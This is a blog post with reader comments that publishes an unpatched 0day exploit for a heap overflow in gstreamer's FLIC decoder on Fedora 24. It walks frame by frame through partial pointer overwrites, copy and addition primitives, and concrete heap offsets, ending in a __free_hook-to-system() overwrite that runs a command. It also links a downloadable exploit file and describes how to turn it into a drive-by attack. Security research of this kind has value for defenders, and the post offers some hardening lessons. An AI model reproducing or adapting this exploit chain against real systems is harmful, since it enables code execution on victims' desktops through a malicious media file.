Monday, November 21, 2016

[0day] [exploit] Advancing exploitation: a scriptless 0day exploit against Linux desktops

Overview
A powerful heap corruption vulnerability exists in the gstreamer decoder for the FLIC file format. Presented here is an 0day exploit for this vulnerability.
This decoder is generally present in the default install of modern Linux desktops, including Ubuntu 16.04 and Fedora 24. Gstreamer classifies its decoders as “good”, “bad” or “ugly”. Despite being quite buggy, and not being a format at all necessary on a modern desktop, the FLIC decoder is classified as “good”, almost guaranteeing its presence in default Linux installs.

Thanks to solid ASLR / DEP protections on the (some) modern 64-bit Linux installs, and some other challenges, this vulnerability is a real beast to exploit.

Most modern exploits defeat protections such as ASLR and DEP by using some form of scripting to manipulate the environment and make dynamic decisions and calculations to move the exploit forward. In a browser, that script is JavaScript (or ActionScript etc.) When attacking a kernel from userspace, the “script” is the userspace program. When attacking a TCP stack remotely, the “script” is the program running on the attacker’s computer. In my previous full gstreamer exploit against the NSF decoder, the script was an embedded 6502 machine code program.

But in order to attack the FLIC decoder, there simply isn’t any scripting opportunity. The attacker gets, once, to submit a bunch of scriptless bytes into the decoder, and try and gain code execution without further interaction...

… and good luck with that! Welcome to the world of scriptless exploitation in an ASLR environment. Let’s give it our best shot.

Obligatory screenshot, and downloads
fedora_flx_exploit.png

In the above screenshot, we see the exploit file opened using xdg-open from the terminal (which does the same thing as a user clicking on a browser download). The exploit file opens in rhythmbox on Fedora, which is shown, as well as the resultant calculator. The terminal output shows an amusing side effect of the exploit, which we’ll cover later.

The exploit is running against a default install of Fedora 24, except that the gstreamer packages were upgraded to the latest: dnf update gstreamer* (v1.8.3-1.fc24.x86_64). We could have targeted either totem or rhythmbox as the binary to exploit, simply by renaming the file extension of the exploit. totem tends to handle video extensions and rhythmbox audio extensions. We chose .flac for rhythmbox.

This vulnerability applies equally as well to Ubuntu 16.04, and probably anything else with gstreamer installed. To get the exploit to work on anything other than the exact Fedora versions noted above, though, you’d need to fiddle with a large number of heap and code offsets in the exploit.

The astute reader will wonder if this exploit might be a full super serious drive by download exploit when paired with my previous Google Chrome and Fedora tracker notes from last week. The answer is sure. If you reworked this exploit to work in the context of the unsandboxed /usr/libexec/tracker-extract process, by fiddling with a few heap offsets etc., you’d have an unpatched drive by download exploit against Chrome + Fedora.

You can download the exploit as demonstrated above from here, or download a fairly minimal crash file to check for the vulnerability here.

Ubuntu vs. Fedora again
Back in 2014, I sandbagged by exploiting Fedora in preference to Ubuntu because Fedora was easier (which we fixed). In this instance, the exact opposite is true: I decided to exploit Fedora because it is much harder. Ubuntu, even in 16.04, has some problems:

  • Missing ASLR on many binaries, including security sensitive ones:
    file /usr/lib/rhythmbox/rhythmbox-metadata
    /usr/lib/rhythmbox/rhythmbox-metadata: ELF 64-bit LSB executable, x86-64
  • Generally little use of RELRO. The Fedora exploit was complicated by having to work around RELRO.

In particular, going after this exploit on Ubuntu would have been much much faster due to the missing ASLR. But the point here is to go after a genuinely scriptless exploit in the presence of solid ASLR. So we choose Fedora as our exploitation target.

The vulnerability
We find the vulnerable decoder code in gst-plugins-good/gst/flx/gstflxdec.c, function flx_decode_delta_fli():

flx_decode_delta_fli (GstFlxDec * flxdec, guchar * data, guchar * dest)
{
...
 /* use last frame for delta */
 memcpy (dest, flxdec->delta_data, flxdec->size);

 start_line = (data[0] + (data[1] << 8));
 lines = (data[2] + (data[3] << 8));
 data += 4;

 /* start position of delta */
 dest += (flxdec->hdr.width * start_line);
 start_p = dest;

 while (lines--) {
   /* packet count */
   packets = *data++;

   while (packets--) {
     /* skip count */
     dest += *data++;

     /* RLE count */
     count = *data++;

     if (count > 0x7f) {
...
     } else {
       /* replicate run */
       while (count--)
         *dest++ = *data++;

The above function is called via a FLX_LC command in the input file. At the time of the call, dest points to the start of the output canvas buffer, e.g. 8 x 8 pixels and always 1 byte per pixel. data points to attacker controlled data from the raw input file.

Unfortunately, it doesn’t take much to see that there’s a complete lack of bounds checking here against the canvas width and height. To get an out-of-bounds write, the attacker simply has to specify a start_line value greater than the number of lines in the output canvas (bug 1). Or they could specify a skip count that goes past the end of the last line of the output canvas (bug 2). Or they could specify a write count that goes past the end of the last line of the output buffer (bug 3) (applies both to the literal run and replicate run code paths).

(Absent a CVE, you can uniquely identify this cluster of issues CESA-2016-0004.)

The constraints and challenges
We’ve identified a very powerful heap overflow primitive, with the following properties:

  • Attacker controls arbitrary number of bytes written, each with an arbitrary value.
  • Non-linear overflow: attacker can “skip over” a bunch of heap to target a precision destination.
  • Attacker controls size of allocation that is overflowed out of, thereby offering some opportunities to control where in the heap it goes.

However, we still need to know what to write out of bounds, which is a challenge without script. Absent any nice piece of data to corrupt, such as a string passed to system(), or a JIT code buffer, we’re going to need to start messing with pointers. And due to the good ASLR, we can’t directly synthesize a valid pointer value.

In order to try and start gaining a bit of control over the exploitation environment, we turn to the rhythmbox media player. This is the default player on the desktop for various audio formats. The rhythmbox / gstreamer combination has some very intriguing (and useful!) properties:

  • No-one really cares about the file extension. So if you put a video file inside a file with an audio file extension, it’ll get processed according to the content and not the file extension.
  • The metadata for a media file is fully scanned, even if it is a video file and not an audio file.
  • rhythmbox does its metadata scanning in a new, fresh subprocess -- rhythmbox-metadata. This results in very clean and predictable heap layouts. Also, if our exploit messes up and crashes, the parent rhythmbox process and UI are largely unaffected.
  • gstreamer decoders typically start off in their own fresh thread, which gets its own fresh thread heap under the modern Linux glibc allocator.

We’ve got enough to fight through without worrying about heap layout, so using rhythmbox to get us a passably deterministic heap setup is a great start.

Unfortunately, using rhythmbox-metadata carries one huge challenge: because it is just extracting metadata from a media file, it only runs the decode loop for just 2 frames. If the amount of work we can do per frame turns out to be limited (and it does!), we have very little opportunity to complete an exploit, or rewire the decode loop to run longer.

The exploit: primitives used
We decide to base our exploit around corrupting the metadata object for the actual decoder itself, which is defined thus:

struct _GstFlxDec {
 GstElement element;
 GstPad *sinkpad,*srcpad;
 gboolean active, new_meta;
 guint8 *delta_data, *frame_data;
 GstAdapter *adapter;
 gulong size;
 GstFlxDecState state;
 gint64 frame_time;
 gint64 next_time;
 gint64 duration;
 FlxColorSpaceConverter *converter;
 FlxHeader hdr;
};

This decoder object is typically referenced through a pointer flxdec in the code. Because of the strong heap consistency described above, we’ll typically find a constant offset between the flxdec->frame_data buffer which we are corrupting off the end of, and the flxdec object itself. This means that we can use a fixed value of start_line in the vulnerable flx_decode_delta_fli() function above, and target corruption of specific fields of this object, such as flxdec->converter. Of course, for all this to work, we need the metadata object to be after flxdec->frame_data in the heap. The heap layout is reasonably deterministic for reasons already covered, and different heap layouts can be achieved by changing the input size canvas, or the file extension (which seems to trigger vastly different logic and code paths inside the file format auto detection).

Trick #1: corrupting the converter field to upgrade to an absolute write primitive
The initial corruption primitive we have is a relative write off the end of an existing heap buffer. On 64-bit, the range is certainly limited such that it is not possible to write earlier in the heap, and writing later in the heap is also subject to some constraints. Given that an exploit needs to deference fairly arbitrary pointers, we’ll need to upgrade our write primitive. Getting an absolute write primitive is great but we should note we need some form of ASLR defeat before the absolute write becomes fully powerful.
If we corrupt flxdec->converter, we can subsequently use a FLX_COLOR256 command in the input file. This effectively calls flx_decode_color(), which writes attacker supplied bytes (in multiples of three) to the address flxdec->converter + 8.

Trick #2: awesomely useful 3-byte partial pointer overwrite within thread heap arena
On modern glibc, malloc() on a thread will return heap chunks from a per-thread heap arena. This heap arena has very strong alignment of 64MB on 64-bit. A typical thread heap start address might be 0x7fffa8000000. This strong alignment is very useful for partial pointer overwrites. Fully 3 bytes can be overwritten without having to worry about differing alignments. In the case of the exploit, the flxdec->converter pointer is partially overwritten so that it points early in the thread heap arena to corrupt a function pointer.

Trick #3: single byte partial pointer overwrite of a function pointer
In the exploit, there’s a function pointer at thread heap arena offset 0x002818, gst_list_iterator_resync(). Linux ASLR places code with page level granularity, and this particular pointer value ends in 0x6f0 within a page. Determinism can be retained by corrupting the single least significant byte, but no more. As is happens, at offset 0x6e8 (accessible via a single byte corruption), there is the code:

 xor  %eax,%eax
 retq

We use that little gadget to force the decoder loop to continue indefinitely, earlier in the exploit.

Trick #4: locating a copy primitive
Being able to perform partial pointer overwrites only is no fun because it will mostly limit us to exploring and corrupting within thread heap arenas. What we’d really like is a copy primitive so that we can read a pointer value and then write it somewhere out of bounds. After a bit of code study, we do see such a primitive in the decode loop. First, the read:

flx_decode_delta_fli (GstFlxDec * flxdec, guchar * data, guchar * dest)
{
...
 /* use last frame for delta */
 memcpy (dest, flxdec->delta_data, flxdec->size);

We can corrupt flxdec->delta_data (either a full overwrite, or a partial pointer overwrite) and therefore read from various interesting memory locations. flx_decode_delta_fli() can be called as many times as we want per frame, via multiple FLX_LC commands. Results of the read are placed in flxdec->frame_data.

And the write:

gst_flxdec_chain() {
        /* decode chunks */
         flx_decode_chunks (flxdec,
             ((FlxFrameType *) chunk)->chunks,
             chunk + FlxFrameTypeSize, flxdec->frame_data);

         /* save copy of the current frame for possible delta. */
         memcpy (flxdec->delta_data, flxdec->frame_data, flxdec->size);

This memcpy() is a write of the content we previously read into flxdec->frame_data. This content is written to flxdec->delta_data, another pointer we can corrupt to point to where we want. Unfortunately, this write only fires once per frame, at the end, and as we covered earlier, we have a frame budget of 2! Together, this read and write are a decent copy primitive. We should be able to use it to chase pointer chains.

Trick #5: corrupting the input file buffer
This trick is pretty neat as is enables us to do more inside our budget of 2 frames. We can use our copy primitive to copy a bunch of pointers and write them into the buffer containing the input file. We can then further corrupt the input file buffer, in the spaces in between the pointers we just copied, to create commands that effectively write real pointer values to useful locations.
We also use this trick in the exploit, to restore flxdec->delta_data. After corrupting it to chase a chain of pointers, we need to put it back, otherwise we’ve lost control of it via partial pointer overwrites. In order to put it back, we write write its original value into the input file buffer.

Trick #6: co-opting an addition primitive
This is my favorite trick used! By far! While the ability to copy pointers around cleanly is very useful, it is rarely going to be sufficient. For example, when building a ROP chain, we’d typically leak a pointer into a code section, such as a function pointer, and then calculate the address of useful opcode sequences based on addition to the leaked pointer. Or, if we want to mess with a GOT entry, it typically isn’t a simple pointer copy, but a read / add / write sequence.
So how can we get an addition primitive going without script?
It turns out that the decoder maintains time from frame to frame, and it does it like this, continuing on from the gst_flxdec_chain() code quoted above:

         /* save copy of the current frame for possible delta. */
         memcpy (flxdec->delta_data, flxdec->frame_data, flxdec->size);

         gst_buffer_map (out, &map, GST_MAP_WRITE);
         /* convert current frame. */
         flx_colorspace_convert (flxdec->converter, flxdec->frame_data,
             map.data);
         gst_buffer_unmap (out, &map);

         GST_BUFFER_TIMESTAMP (out) = flxdec->next_time;
         flxdec->next_time += flxdec->frame_time;

This is super cool: we can co-opt that frame time calculation to instead be an addition of a constant of our choosing to a pointer. We just have to copy a pointer into flxdec->frame_time and write the addition constant to flxdec->next_time. When the next frame starts, a new calculated pointer will be present in flxdec->next_time and we can again use our copy primitive to put it somewhere useful.

The exploit: frame-by-frame
With detailed study into primitives available, we’re now in a position to link a bunch of them together to get an exploit going, no script required ;-) We’ll break things down into the actions taken each frame. If things look a little bit busy in the first couple of frames, don’t be surprised. Remember, we have just 2 frames to do something drastic to cause the decoder to continue into further frames.

Frame 1
  • Use FLX_LC to do a 3 byte partial pointer overwrite on flxdec->converter; point it to offset 0x280e into thread heap arena.
  • Use FLX_COLOR256 to do a 1 byte partial pointer overwrite on a gst_list_iterator_resync() pointer; point it to a gadget that does “return 0”.
  • FLX_LC; point flxdec->converter to offset 0x2830.
  • FLX_COLOR256; 3 byte partial pointer overwrite of existing pointer into thread heap arena, make it point to offset 0x24100, which is a GstPad object.
  • FLX_LC; point flxdec->converter to offset 0x2840.
  • FLX_COLOR256; 3 byte partial pointer overwrite of existing pointer into thread heap arena, make it point to offset 0x24100, which is a GstPad object.
  • FLX_LC; point flxdec->converter to offset 0x2824.
  • FLX_COLOR256; write 12 bytes of FLIC protocol in between pointers we just corrupted, to form a chunk of input file.
  • FLX_LC; point flxdec->converter to offset 0x2837.
  • FLX_COLOR256; write 9 bytes of FLIC protocol in between pointers we just corrupted, to form a chunk of input file.
  • FLX_LC; point flxdec->converter to offset 0x3a118. This is actually inside the flxdec object and is guaranteed to be a string of 8 zeros. This is necessary to prevent the converter from being used (and crashing) at end of frame.
  • FLX_LC; 3 byte partial pointer overwrite to point flxdec->delta_data to offset 0x2818.
  • FLX_LC; no-op to set flxdec->size to 56, but it is already 56. This is a relic from an earlier version of the exploit.
  • FLX_LC; point flxdec->delta_data to offset 0x3cb68. This is inside the input file buffer.
  • Allow frame tick.
  • Copy primitive is invoked: the last FLX_LC reads 56 bytes at thread heap arena offset 0x2818 into flxdec->frame_data. And then the frame tick copies those 56 bytes from flxdec->frame_data to flxdec->delta_data, which points to the input buffer. We just copied a chunk of program, with 3 embedded pointer values, to the input buffer.

Frame 2
  • FLX_LC; point flxdec->converter to offset 0x240f6, which is just before a GstPad object that we want to corrupt. This object controls whether decoding continues or not.
  • FLX_COLOR256; no-op, just to get the alignment of the input file right.
  • FLX_COLOR256; copy a few bits to corrupt the GstPad, including copying the “return 0” function pointer gadget on top of GstPad::chainfunc. This value is not in the original input file, and only placed there by the input buffer corruption in frame 1 above.
  • FLX_COLOR256; copy a few more bits to corrupt the GstPad, including replacing GstPad::peer and GstPad::parent with pointers to the GstPad itself. Again, these values are not in the original input file, and only placed there by the input buffer corruption in frame 1 above.
  • FLX_LC; set flxdec->size to 8. Maybe superfluous.
  • FLX_LC; set flxdec->converter to offset 0x24128, which is inside the GstPad object we are busy corrupting and faking.
  • FLX_COLOR256; write the value 0, this effectively sets GstPad::flags to 0.
  • FLX_LC; set flxdec->converter to offset 0x241c8, which is inside the GstPad object.
  • FLX_COLOR256; write the value 1, this effectively set GstPad::mode to GST_PAD_MODE_PUSH.
  • FLX_LC; set flxdec->converter to offset 0x242d0, which is inside the GstPad object.
  • FLX_COLOR256; write the value 0, this effectively sets GstPad::num_probes to 0.
  • FLX_LC; set flxdec->converter to offset 0x3a118, which is a safe place for frame tick as per frame 1.
  • FLX_LC; set flxdec->delta_data to offset 0x24128, which is a read of GstPad::parent (which we set to point to the GstPad itself, at offset 0x24100).
  • FLX_LC; set flxdec->delta_data to offset 0x3a110, which is flxdec->srcpad.
  • Allow frame tick, which copies the value of the GstPad pointer into flxdec->srcpad.

Right here is a critical time in the exploit. We need to have corrupted enough of the gstreamer decoder state to prevent the decode loop from stopping. The key code line to cause continuation is here in gstflxdec.c:

        res = gst_pad_push (flxdec->srcpad, out);
We need this to return GST_FLOW_OK (0). It succeeds because we’ve pointed flxdec->srcpad to a thoroughly hacked up GstPad, which streamlines code flow through gst_pad_push(), to return 0 as easily as possible. In the end it wasn’t that easy -- various pointers are chased even during the simplest code path, and a function pointer is called, even when you clear all the flags and special status variables. We eventually win the “return 0” when flxdec->srcpad->peer->chainfunc is called, which we set to our special gadget we created with a partial function pointer overwrite.

Frame 3
Things are a bit more sane now. We can do a simpler amount of work per frame tick without having to worry about running out of frame ticks. We can use the copy / addition primitive available at frame tick as many times as necessary.
  • FLX_LC; set flxdec->name to offset 0x3a148, which now points to flxdec->frame_time. flxdec->name is not special in the code, it’s just a convenient place to build and store a derived pointer value for later use.
  • FLX_LC; set flxdec->delta_data to offset 0x3a020, which points to flxdec->name.
  • FLX_LC; set flxdec->delta_data to offset 0x3cf4a, which is inside the input file buffer.
  • Frame tick: copies from flxdec->name, which contains the value &flxdec->frame_time, to a point in the input file buffer; we’ll need it later.

Frame 4
  • FLX_LC; set flxdec->next_time to the 8 byte value 0x140, which is a constant we want our addition engine to add.
  • FLX_LC; set flxdec->delta_data to offset 0x3a108, which will cause a read of flxdec->sinkpad.
  • FLX_LC; set flxdec->delta_data to offset 0x3a148, which is &flxdec->frame_time.
  • Frame tick: copies flxdec->sinkpad to flxdec->frame_time, which is then added to flxdec->next_time, leaving flxdec->sinkpad + 0x140 in flxdec->next_time.

Frame 5
  • FLX_LC; set flxdec->delta_data to offset 0x3a150, which is a read of flxdec->next_time, or our calculated pointer value.
  • FLX_LC; set flxdec->delta_data to offset 0x3c8b0, which is a saving of our calculated pointer value toward the beginning of the input file buffer. Also useful for debugging.
  • Frame tick, already explained.

Frame 6
  • FLX_LC; read the saved calculated pointer value at offset 0x3c8b0.
  • FLX_LC; write it to offset 0x3a120, which is flxdec->delta_data.
  • Frame tick, already explained.

Frame 7
  • FLX_LC; reads from flxdec->delta_data which currently points to flxdec->sinkpad + 0x140. This reads the value of a gst_flxdec_chain() function pointer.
  • FLX_COLOR256; writes the pointer value that we wrote into the input file buffer in frame 3 above, which is &flxdec->frame_time. Writes it to flxdec->delta_data, restoring it. Until we restored it, it pointed outside of the thread heap arena, so the partial pointer overwrites that we’ve been using were broken until we just restored it.
  • Frame tick: writes the value of the gst_flxdec_chain() function pointer to flxdec->frame_time.

Frame 8
  • FLX_LC; writes 8 byte pointer offset value 0x202f70 to flxdec->next_time.
  • Frame tick: addition! Leaves gst_flxdec_chain() + 0x202f70 in flxdec->next_time. This is the read only address of the memcpy() GOT entry.

Frame 9
  • FLX_LC; points flxdec->delta_data to &flxdec->next_time, for read of calculation result.
  • FLX_LC; points flxdec->delta_data to offset 0x3c8c0, a place in the in input file buffer, to write the calculation result at frame tick time.
  • Frame tick, already explained.

Frame 10
  • FLX_LC; set flxdec->name to offset 0x3a148, which now points to flxdec->frame_time. (Can’t convince myself this is still necessary -- I don’t think the value changed since we set it to the same value in frame 3).
  • FLX_LC; set flxdec->delta_data to offset 0x3a020, which points to flxdec->name.
  • FLX_LC; set flxdec->delta_data to offset 0x3d1ca, which is inside the input file buffer.
  • Frame tick: copies from flxdec->name, which contains the value &flxdec->frame_time, to a point in the input file buffer; we’ll need it later.

Frame 11
  • FLX_LC; point flxdec->delta_data to read from offset 0x3c8c0, which is where we stashed the GOT address of the memcpy() function pointer in frame 9.
  • FLX_LC; point flxdec->delta_data to write to flxdec->delta_data at frame tick. Writes the GOT address of memcpy() to flxdec->delta_data.
  • Frame tick, already explained.

Frame 12
  • FLX_LC; reads from flxdec->delta_data, effectively reading the memcpy() function pointer value into flxdec->frame_data.
  • FLX_COLOR256; writes the pointer value that we wrote into the input file buffer in frame 10 above, which is &flxdec->frame_time. Writes it to flxdec->delta_data, restoring it.
  • Frame tick: writes the value of the memcpy() function pointer to flxdec->frame_time.

Frame 13
  • FLX_LC; writes 8 byte pointer offset value 0xffffffffffef91c0  to flxdec->next_time.
  • Frame tick: addition! Leaves memcpy() + 0xffffffffffef91c0 in flxdec->next_time. This is effectively a subtraction, calculating the address of system().

Frame 14
  • Abbreviating a bit harder now. Read the result in flxdec->next_time and write it to offset 0x3c8d0, which is a useful storage location in the input file buffer.

Frame 15
  • Read the stored system() value at offset 0x3c8d0, and write it to flxdec->frame_time.

Frame 16
  • Write pointer offset value 0x37b840 into flxdec->next_time, and use frame tick to add it to system(). The result is 8 bytes before __free_hook in the glibc BSS. (We use 8 bytes before because we’re going to do a write through flxdec->converter, which writes at an offset of positive 8 bytes.)

Frame 17
  • Read the resulting value from flxdec->next_time and stash it safely away at offset 0x3c8e0, a useful storage location in the input file buffer.

Frame 18
  • Read the stashed __free_hook - 8 address value at offset 0x3c8e0, and write it at offset 0x3d60a, which is further forward into the input file buffer.

Frame 19
  • Read the stashed system() value at offset 0x3c8d0, and write it at offset 0x3d62a, which is further forward into the input file buffer.

Frame 20
  • FLX_LC; point flxdec->converter to offset 0x39808, which is the value of the local pointer chunk in the decode loop.
  • FLX_COLOR256; write the string “gnome-calculator”.
  • FLX_LX; point flxdec->converter to &flxdec->converter - 8.
  • FLX_COLOR256; write over flxdec->converter. The value written is the pointer value written into the input file buffer in frame 18, which is __free_hook - 8. The next FLX_COLOR256 will therefore write over __free_hook.
  • FLX_COLOR256; write system() on top of __free_hook. We get system() from the input file buffer, where we wrote it in frame 19.

At this point, the decode loop will run free(chunk), causing the free hook to be called. Since the free hook is system(), and the contents of chunk is gnome-calculator, then we get a calculator. Win! As a side effect, tons of calls are made to system() as the rest of the process frees memory. Sometimes, there are side effects as the shell proceeds to interpret the content of heap chunks :-)

Closing notes
This was a fairly ridiculous exploit. But it was worth doing because it’s proof that scriptless exploits are possible, even within the context of decent 64-bit ASLR. It was possible to commandeer memory reads, writes and even additions within the decoder loop to slowly but surely advance the exploit and gain control.

There are definitely some specific lessons to learn regarding Linux desktop security:

  • Ubuntu has problems with missing defenses such as ASLR, RELRO, etc., even in the latest 16.04 LTS release.
  • The elevation of the FLIC format decoder into the gstreamer “good” plugins set was probably a mistake.
  • More generally, the partitioning of gstreamer decoders into “good”, “bad” and “ugly” makes sense on some levels, but not for security. For security, a partition of “useful” vs. “obscure” might make more sense. The obscure codecs only provide risk -- I’d recommend even removing the automatic UI (accessed by e.g. totem) for installing obscure codecs, because it’s not as if standard users need them unless they are under attack.
  • The final exploit primitive was the corruption of the __free_hook glibc variable. We had to go after a variable like this because on Fedora, the GOT function pointers are read only, and… we don’t like ROP, right? :-) It’s worth noting that other critical function pointers are protected within glibc. For example, both the atexit() and tls_dtor_list function pointers are protected by xor’ing with a “secret”. By the same underlying reasoning, __free_hook is probably attackable enough that it should be similarly protected. The value of doing so against an arbitrary read / write primitive is however debateable.
  • Code that automatically indexes or thumbnails media files really needs to be sandboxed in this day and age.


13 comments:

Sanjuro said...

ty

wily said...

badass.

Anonymous said...

Thanks, this blog entry was very well written, as non-coder admin like me could catch it on.

Robert said...

On Fedora 25, tracker-extract crashed after downloading the file :)

ubuntusysadmin said...

Worth mentioning what an incredible piece of work this entire exploit is.

antikythera said...

Have you tested this against gstreamer1 build 1.10.0-1.fc25? just curious as to whether the same applies.

Unknown said...

Can the same approach be applied to the GPU video decoding as well to bypass from user level to the 0 ring system level directly?

Anonymous said...

No Ivan, although you could chain this exploit with a totally different one in order to get from non-executable media file to ring 0. In order to communicate directly with the GPU, you have to pass buffers via IOCTLs to /dev/dri/renderD128. You get more GPU functionality with /dev/dri/card0, but that requires CAP_SYS_ADMIN (and if you have that capability, you already can trivially get to ring 0 in most cases). You'd have to have an additional, and likely similarly complex vulnerability to exploit in the DRM engine in the kernel code responsible for parsing the data sent to it through the render node.

Of course, at the point where you're running code exec, there are so many other ways to get ring 0, so why limit yourself to DRM? You could attack vm86 on 32bit systems, or ldt_modify, or everything possible under unprivileged user namespaces, or unprivileged eBPF, or obscure network protocols... The possibilities are endless. You're not limited to using DRM. Of course, that's not to say that many graphics drivers aren't riddled with holes!

This is why blogs like this are so important. Someone could make a lot of money working full time writing exploits like these, then chaining them with kernel 0days and selling them to government contractors like Leidos or exploit brokers like Zerodium, who would then use them to get ring 0 on some poor activist's computer by sending them a .mp3 file. There are a lot more people who have these skills out there who don't educate us on vulnerabilities (or who don't do so as openly).

Well that was a bit of a digression. Anyway no, this specific approach could not get ring 0, especially not directly. You would need to chain it with a second 0day.

Anonymous said...

Wow.

Anonymous said...

Thanks for posting this!

shevairi said...

Well Done !

Anonymous said...

Hi,

Thanks for the great write-up. I have two questions. First, I don't see flxdec->name anywhere in the source; this does not seem to be a field in the GstFlxDec struct, but is reference in your post. Am I looking at the wrong source code and/or the wrong struct?

Second, I don't understand how you can overwrite pointer addresses and still ensure they point where you want them in the presence of ASLR for heap allocations. For subsequent runs of the process, the only the least-significant 12 bits of an address will remain constant, and the upper bits may all change.

For example: "FLX_LC; point flxdec->converter to offset 0x3a118. This is actually inside the flxdec object and is guaranteed to be a string of 8 zeros."

Even if I have an arbitrary write to flxdec->converter due to the bug you describe, I can overwrite the least-significant X bytes of flxdec->converter where X is an integer. Now, when I compiled the vulnerable application code, the offset between flxdec->converter and flxdec was greater than 0x0100. If it were less than 0x100, then a one byte overwrite of the least significant byte would be sufficient. But if it is more than 0x100, this is a problem because one cannot predict the upper four bits of the second-least significant byte of the address of flxdec.

I assume I am misunderstanding something, and I welcome insight. In particular, I am interpreting ""FLX_LC; point flxdec->converter to offset 0x3a118" to mean that an exploit would use the FLX_LC chunk type to write over the three least significant bytes of flxdec->converter with 0x03, 0xa1, and 0x18. But perhaps this is not right?

Anonymous said...

I would like to ask some bloggers whether there is a demonstration video of operation and how to realize bit by bit offset